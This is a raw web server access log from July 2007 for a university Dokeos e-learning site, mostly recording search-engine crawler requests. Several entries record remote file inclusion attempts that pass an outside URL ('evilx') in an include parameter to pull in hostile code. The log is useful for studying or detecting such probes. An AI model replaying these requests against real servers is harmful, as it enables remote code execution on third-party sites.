65.55.208.243 - - [23/Jul/2007:04:04:10 +0200] "GET /dokeos/ujf/whoisonline.php?id=193 HTTP/1.0" 200 2793 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:04:04:25 +0200] "GET /dokeos/ujf/courses/MINCOMVOX/document/mp3player.swf?son=http%3A%2F%2Fopus.reseau.fr%2Fdokeos%2Fujf%2Fcourses%2FMINCOMVOX%2Fdocument%2Faudio%2Fchapter10qu53%3F0 HTTP/1.1" 200 2186 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.171 - - [23/Jul/2007:04:06:22 +0200] "GET /dokeos/palm/claroline/learnpath/learnpath_handler.php?learnpath_id=6&cidReq=GENELEC HTTP/1.1" 200 8220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.244 - - [23/Jul/2007:04:09:15 +0200] "GET /dokeos/gu/courses/LEA001/document/Utilisation_LEA_maitre_apprentissage.doc?cidReq=LEA001 HTTP/1.0" 200 19456 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.244 - - [23/Jul/2007:04:09:18 +0200] "GET /dokeos/palm/courses/DEMOGESTPROJ/document/Fichaid_pnotes_sq4.doc?cidReq=DEMOGESTPROJ HTTP/1.0" 200 39936 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.244 - - [23/Jul/2007:04:09:49 +0200] "GET /dokeos/gu/claroline/scorm/scormdocument.php?cidReq=TEST47fe&subdirs=yes&openDir=%2FB6_SCORM_QUADRAscorm%2F_lFRE%2Fimg HTTP/1.0" 200 7564 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.244 - - [23/Jul/2007:04:09:49 +0200] "GET /dokeos/palm/whoisonline.php?referer=%2Fdokeos%2Fpalm%2Fclaroline%2Flearnpath%2Flearnpath_handler.php%3Flearnpath_id%3D6%26cidReq%3DDEMOMN HTTP/1.0" 200 3419 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.23.114 - - [23/Jul/2007:04:10:32 +0200] "GET /dokeos/cuef/DOKEOS/document/Familiarisation_Dokeos(1).doc HTTP/1.0" 404 335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.32 - - [23/Jul/2007:04:11:05 +0200] "GET /dokeos/gu/claroline/user/user.php?cidReq=DOKEOS HTTP/1.0" 200 4708 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:11:18 +0200] "GET /dokeos/gu/whoisonline.php?referer=%2Fdokeos%2Fgu%2Fclaroline%2Fuser%2FuserInfo.php%3FcidReq%3DDOKEOSAT%26origin%3D%26uInfo%3D33 HTTP/1.0" 200 3341 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:11:24 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fdocument.php%3Faction%3Ddownload%26id%3D%252Fsport.html HTTP/1.0" 200 3519 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:11:30 +0200] "GET /dokeos/cuef/claroline/learnpath/learnpath_handler.php?cidReq=EXPRESSION&learnpath_id=1 HTTP/1.0" 200 20548 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:12:16 +0200] "GET /erudist/forum/message.php?pageNum_Recordset2=1&totalRows_Recordset2=1010&mess_id=8 HTTP/1.0" 404 303 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.68.147 - - [23/Jul/2007:04:12:21 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Fid%3D1067 HTTP/1.0" 200 3094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.246 - - [23/Jul/2007:04:13:25 +0200] "GET /dokeos/fc-ujf/whoisonline.php?referer=%2Fdokeos%2Ffc-ujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Ffc-ujf%252Fcourses%252FFSM%252F HTTP/1.0" 200 3500 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:13:27 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1176 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:13:28 +0200] "GET /dokeos/upmf/claroline/document/document.php?cidReq=ALN1&curdirpath=%2FTravaux_dirig%E9s HTTP/1.0" 200 14014 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:13:28 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1561 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:13:28 +0200] "GET /dokeos/palm/claroline/document/document.php?cidReq=DEMOMN HTTP/1.0" 200 9880 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:13:30 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1063 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.32 - - [23/Jul/2007:04:15:30 +0200] "GET /dokeos/palm/claroline/learnpath/learnpath_handler.php?learnpath_id=4&chapter_id=8&action=add&type=learnpathitem HTTP/1.0" 200 2341 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.18.102 - - [23/Jul/2007:04:15:38 +0200] "GET /dokeos/inpg HTTP/1.0" 301 322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.102 - - [23/Jul/2007:04:15:47 +0200] "GET /dokeos/inpg/ HTTP/1.0" 200 10717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.245 - - [23/Jul/2007:04:16:16 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1512 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:16:16 +0200] "GET /dokeos/gu/claroline/document/headerpage.php?file=%2FGroupe_2_groupdocs%2Ftest_1.html HTTP/1.0" 200 2430 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:16:16 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fstendhal%252Fwhoisonline.php%253Fid%253D2229 HTTP/1.0" 200 3300 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:16:17 +0200] "GET /dokeos/upmf/claroline/announcements/announcements.php?cidReq=EQUADIF1 HTTP/1.0" 200 4046 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:16:17 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D802 HTTP/1.0" 200 3204 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
66.249.65.171 - - [23/Jul/2007:04:16:23 +0200] "GET /dokeos/stendhal/claroline/link/link_goto.php?link_id=3&link_url=http%3A%2F%2Fw3.u-grenoble3.fr%2Ffle-1-ligne HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.98.32 - - [23/Jul/2007:04:17:26 +0200] "GET /dokeos/palm/claroline/learnpath/learnpath_handler.php?learnpath_id=4&chapter_id=9&action=add&type=learnpathitem HTTP/1.0" 200 2341 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
208.36.144.12 - - [23/Jul/2007:04:17:56 +0200] "GET /dokeos/gu/claroline/link/link_goto.php?link_id=daily+independent&link_url=http://than_force.googte.info HTTP/1.0" 302 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
83.16.15.42 - - [23/Jul/2007:04:19:35 +0200] "GET /dokeos/upmf/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.805"
83.16.15.42 - - [23/Jul/2007:04:19:40 +0200] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
83.16.15.42 - - [23/Jul/2007:04:19:43 +0200] "GET /dokeos/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
207.46.98.31 - - [23/Jul/2007:04:20:20 +0200] "GET /dokeos/ujf/claroline/document/document.php?cidReq=MEC360 HTTP/1.0" 200 7248 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:22:03 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D587 HTTP/1.0" 200 3204 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:22:03 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252F%253Fcategory%253Dufrgeo HTTP/1.0" 200 3192 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
193.49.48.249 - - [23/Jul/2007:04:22:03 +0200] "GET /dokeos HTTP/1.0" 301 317 "-" "libwww-perl/5.805"
207.46.98.31 - - [23/Jul/2007:04:23:50 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fwhoisonline.php%3Fid%3D1916 HTTP/1.0" 200 3178 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:23:51 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fwhoisonline.php%3Fid%3D2271 HTTP/1.0" 200 3178 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:26:15 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fdownload.php%3Fdoc_url%3D%2Ffeuilles_niveau_2%2Flabo2408.htm HTTP/1.0" 200 3529 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.250 - - [23/Jul/2007:04:26:38 +0200] "GET /debats/read.php?1,19063,19063 HTTP/1.0" 404 293 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:26:54 +0200] "GET /dokeos/ujf/claroline/document/document.php?action=download&id=%2FPT%2Fconsignes.html HTTP/1.0" 200 2323 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.17.112 - - [23/Jul/2007:04:28:19 +0200] "GET /dokeos/palm/whoisonline.php?referer=%2Fdokeos%2Fpalm%2Fclaroline%2Fdocument%2Fdownload.php%3Fdoc_url%3D%2F5.3prise_notes_MethodNum.htm HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.245 - - [23/Jul/2007:04:28:36 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fdocument.php%3Faction%3Ddownload%26id%3D%252Ffeuilles_niveau_1%252Fecole.htm HTTP/1.0" 200 3561 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:28:41 +0200] "GET /dokeos/palm/claroline/document/document.php?cidReq=GENELEC&curdirpath=%2Fexercices%2F0.1_grec HTTP/1.0" 200 15897 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:28:41 +0200] "GET /dokeos/stendhal/claroline/document/document.php?origin=&column=2&direction=3&page_nr=1&per_page=100&curdirpath=%2FSemestre_5%2Fparcours_Langage_et_apprentissages HTTP/1.0" 200 2486 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:28:42 +0200] "GET /dokeos/edaf/claroline/document/document.php?action=download&id=%2FCodirecteurs_fran%E7ais%2FWIONET_c.html HTTP/1.0" 200 2602 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:29:50 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Fid%3D794 HTTP/1.0" 200 3092 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.25.107 - - [23/Jul/2007:04:29:56 +0200] "GET /esprit/zone_cours-index.php?idForm=81&idMod=294&idUnite=1188 HTTP/1.0" 200 1799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.107 - - [23/Jul/2007:04:29:57 +0200] "GET /esprit/zone_cours-titre.php HTTP/1.0" 200 152 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.107 - - [23/Jul/2007:04:29:58 +0200] "GET /esprit/zone_cours-menu.php HTTP/1.0" 200 151 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.107 - - [23/Jul/2007:04:29:58 +0200] "GET /esprit/themes/esprit/frame_separation.htm HTTP/1.0" 200 70 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.107 - - [23/Jul/2007:04:29:59 +0200] "GET /esprit/themes/esprit/blank.htm HTTP/1.0" 200 172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.25.107 - - [23/Jul/2007:04:30:00 +0200] "GET /esprit/menu.php?idForm=81&idMod=294&idUnite=1188&idActiv=0&idSousActiv=0 HTTP/1.0" 200 2145 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.252 - - [23/Jul/2007:04:30:07 +0200] "GET /dokeos/stendhal/claroline/document/document.php?origin=&column=1&direction=3&page_nr=1&per_page=100&curdirpath=%2FSemestre_2%2FDIVNOVA_L1 HTTP/1.0" 200 2462 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:30:07 +0200] "GET /dokeos/upmf/claroline/document/document.php?action=download&id=%2FTravaux_dirig%E9s%2FAN1_TD5.pdf HTTP/1.0" 200 2125 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:30:18 +0200] "GET /dokeos/ujf/whoisonline.php?id=1374 HTTP/1.0" 200 2794 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
64.40.99.241 - - [23/Jul/2007:04:31:25 +0200] "GET /dokeos/upmf/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.65"
64.40.99.241 - - [23/Jul/2007:04:31:26 +0200] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 287 "-" "libwww-perl/5.65"
64.40.99.241 - - [23/Jul/2007:04:31:27 +0200] "GET /dokeos/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 294 "-" "libwww-perl/5.65"
85.10.128.248 - - [23/Jul/2007:04:31:37 +0200] "GET /dokeos/upmf/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.803"
85.10.128.248 - - [23/Jul/2007:04:31:38 +0200] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
85.10.128.248 - - [23/Jul/2007:04:31:38 +0200] "GET /dokeos/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 294 "-" "libwww-perl/5.803"
207.46.98.31 - - [23/Jul/2007:04:31:44 +0200] "GET /dokeos/iep/whoisonline.php?referer=%2Fdokeos%2Fiep%2Fclaroline%2Fdocument%2Fheaderpage.php%3Ffile%3D%252FTh%25E8mes_des_expos%25E9s_html.html HTTP/1.0" 200 3519 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:31:45 +0200] "GET /dokeos/cuef/whoisonline.php?referer=%2Fdokeos%2Fcuef%2Fclaroline%2Fdocument%2Fheaderpage.php%3Ffile%3D%252Fexo3adjbis1.htm HTTP/1.0" 200 3497 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:32:10 +0200] "GET /dokeos/stendhal/whoisonline.php?id=2078 HTTP/1.0" 200 2883 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:32:10 +0200] "GET /dokeos/stendhal/whoisonline.php?id=2034 HTTP/1.0" 200 2883 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:32:11 +0200] "GET /dokeos/stendhal/whoisonline.php?id=2152 HTTP/1.0" 200 2883 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:32:16 +0200] "GET /dokeos/stendhal/whoisonline.php?id=2037 HTTP/1.0" 200 2883 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:32:24 +0200] "GET /erudist/page.php?idce=79 HTTP/1.0" 404 294 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.252 - - [23/Jul/2007:04:32:26 +0200] "GET /dokeos/upmf/claroline/document/document.php?action=download&id=%2Fexercices_corrig%E9s%2Fdenigement.xls HTTP/1.0" 200 2125 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
70.84.7.74 - - [23/Jul/2007:04:32:27 +0200] "GET /dokeos/upmf/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.806"
70.84.7.74 - - [23/Jul/2007:04:32:28 +0200] "GET /index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 287 "-" "libwww-perl/5.806"
70.84.7.74 - - [23/Jul/2007:04:32:29 +0200] "GET /dokeos/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 294 "-" "libwww-perl/5.806"
207.46.98.31 - - [23/Jul/2007:04:33:07 +0200] "GET /erudist/forum/message.php?pageNum_Recordset2=137&totalRows_Recordset2=686&mess_id=8 HTTP/1.0" 404 303 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.245 - - [23/Jul/2007:04:34:55 +0200] "GET /dokeos/stendhal/whoisonline.php?id=2 HTTP/1.0" 200 2880 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
193.49.48.249 - - [23/Jul/2007:04:35:17 +0200] "GET /dokeos/palm/courses HTTP/1.0" 301 330 "-" "libwww-perl/5.805"
65.55.208.250 - - [23/Jul/2007:04:35:47 +0200] "GET /dokeos/upmf/claroline/document/document.php?action=download&id=%2FCOURS5.pdf HTTP/1.0" 200 2125 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
193.49.48.249 - - [23/Jul/2007:04:36:10 +0200] "GET /dokeos/inpg/courses HTTP/1.0" 301 330 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:36:24 +0200] "GET /dokeos/upmf/courses HTTP/1.0" 301 330 "-" "libwww-perl/5.805"
66.249.65.171 - - [23/Jul/2007:04:36:33 +0200] "GET /dokeos/palm/courses/DEMOGESTPROJ/document/video_-_Introduction_a_la_gestion_de_projet/intro.htm?cidReq=DEMOGESTPROJ&rand=920 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.25.26 - - [23/Jul/2007:04:36:34 +0200] "GET /dokeos/inpg/courses/ HTTP/1.0" 200 49 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.98.31 - - [23/Jul/2007:04:36:43 +0200] "GET /dokeos/inpg/courses/VALETACCLIB/document/Liste_par_competences/E4_civiGB.html?cidReq=VALETACCLIB HTTP/1.0" 200 2085 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:37:04 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fwhoisonline.php%253Fid%253D1094 HTTP/1.0" 200 3206 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.31 - - [23/Jul/2007:04:37:10 +0200] "GET /dokeos/iep/whoisonline.php?referer=%2Fdokeos%2Fiep%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fiep%252Fwhoisonline.php%253Fid%253D1468 HTTP/1.0" 200 3509 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
70.84.7.74 - - [23/Jul/2007:04:37:26 +0200] "GET /dokeos/upmf/index.php?include=-_french.html/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.806"
207.46.98.31 - - [23/Jul/2007:04:37:54 +0200] "GET /dokeos/palm/claroline/document/download.php?doc_url=/exercices/3.1_mots_cles/3.1_mots_cles.htm HTTP/1.0" 200 2318 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
64.40.99.241 - - [23/Jul/2007:04:37:56 +0200] "GET /dokeos/upmf/index.php?include=-_french.html/index.php?include=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 200 9748 "-" "libwww-perl/5.65"
193.49.48.249 - - [23/Jul/2007:04:38:09 +0200] "GET /dokeos/cuef/courses HTTP/1.0" 301 330 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:38:31 +0200] "GET /dokeos/stendhal/claroline/scorm HTTP/1.0" 301 342 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:38:31 +0200] "GET /dokeos/stendhal/claroline/scorm/ HTTP/1.0" 200 110 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:38:34 +0200] "GET /dokeos/upmf/claroline/scorm HTTP/1.0" 301 338 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:38:34 +0200] "GET /dokeos/upmf/claroline/scorm/ HTTP/1.0" 200 107 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:39:32 +0200] "GET /dokeos/stendhal/courses HTTP/1.0" 301 334 "-" "libwww-perl/5.805"
207.46.98.31 - - [23/Jul/2007:04:39:36 +0200] "GET /dokeos/ujf/whoisonline.php?referer=%2Fdokeos%2Fujf%2Fwhoisonline.php%3Freferer%3D%252Fdokeos%252Fujf%252Fclaroline%252Flink%252Flink.php%253Furlview%253D00000000000 HTTP/1.0" 200 3262 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.23.220 - - [23/Jul/2007:04:40:00 +0200] "GET /dokeos/stendhal/claroline/phpbb/reply.php?topic=11&forum=3 HTTP/1.0" 200 2377 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.49.48.249 - - [23/Jul/2007:04:40:24 +0200] "GET /dokeos/ese/claroline/scorm HTTP/1.0" 301 337 "-" "libwww-perl/5.805"
193.49.48.249 - - [23/Jul/2007:04:40:24 +0200] "GET /dokeos/ese/claroline/scorm/ HTTP/1.0" 200 107 "-" "libwww-perl/5.805"
74.6.69.220 - - [23/Jul/2007:04:41:43 +0200] "GET /erudist/page.php?ido=295 HTTP/1.0" 404 294 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.243 - - [23/Jul/2007:04:42:01 +0200] "GET /dokeos/inpg/claroline/learnpath/contents.php?menu=my_status&source_id=5&learnpath_id=1&chapter_id=&originalresource=no&fs= HTTP/1.0" 200 580 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.32 - - [23/Jul/2007:04:42:34 +0200] "GET /dokeos/cuef/courses/EXPRESSION/document/qcmfauxamis.htm?cidReq=EXPRESSION&rand=4298 HTTP/1.0" 200 48925 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
208.36.144.12 - - [23/Jul/2007:04:44:01 +0200] "GET /dokeos/stendhal/whoisonline.php?referer=%2Fdokeos%2Fstendhal%2Fclaroline%2Fdocument%2Fdocument.php%3Fcurdirpath%3D%252FSemestre_1 HTTP/1.0" 200 3256 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
65.214.44.193 - - [23/Jul/2007:04:44:06 +0200] "GET /robots.txt HTTP/1.0" 404 288 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.44.193 - - [23/Jul/2007:04:44:19 +0200] "GET /erudist HTTP/1.0" 301 318 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.44.193 - - [23/Jul/2007:04:44:34 +0200] "GET /erudist/ HTTP/1.0" 200 510 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.249.65.171 - - [23/Jul/2007:04:46:41 +0200] "GET /dokeos/palm/claroline/learnpath/learnpath_handler.php?learnpath_id=6&cidReq=P2MXMNU1 HTTP/1.1" 200 10693 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.28.152 - - [23/Jul/2007:04:48:38 +0200] "GET /dokeos/palm/claroline/document/showinframes.php?cidReq=DEMOGESTPROJ&file=/video_-_Introduction_a_la_gestion_de_projet/intro.htm HTTP/1.0" 200 874 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.152 - - [23/Jul/2007:04:48:39 +0200] "GET /dokeos/palm/claroline/document/headerpage.php?file=%2Fvideo_-_Introduction_a_la_gestion_de_projet%2Fintro.htm HTTP/1.0" 200 2476 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.152 - - [23/Jul/2007:04:48:39 +0200] "GET /dokeos/palm/courses/DEMOGESTPROJ/document/video_-_Introduction_a_la_gestion_de_projet/intro.htm?cidReq=DEMOGESTPROJ&rand=4882 HTTP/1.0" 200 4043 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.255.119.178 - - [23/Jul/2007:04:49:04 +0200] "GET /erudist/forum/message.php?pageNum_Recordset2=4&totalRows_Recordset2=275&mess_id=8 HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.255.119.178 - - [23/Jul/2007:04:49:04 +0200] "GET /erudist/forum/message.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.255.119.178 - - [23/Jul/2007:04:49:05 +0200] "GET /erudist/forum HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.255.119.178 - - [23/Jul/2007:04:49:05 +0200] "GET /erudist HTTP/1.1" 301 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
